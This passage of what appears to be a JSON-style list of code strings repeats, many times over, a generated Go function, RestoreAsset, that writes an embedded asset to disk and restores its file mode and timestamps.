os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func RestoreAsset(dir, name string) error {\n\tdata, err := Asset(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\tinfo, err := AssetInfo(name)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func 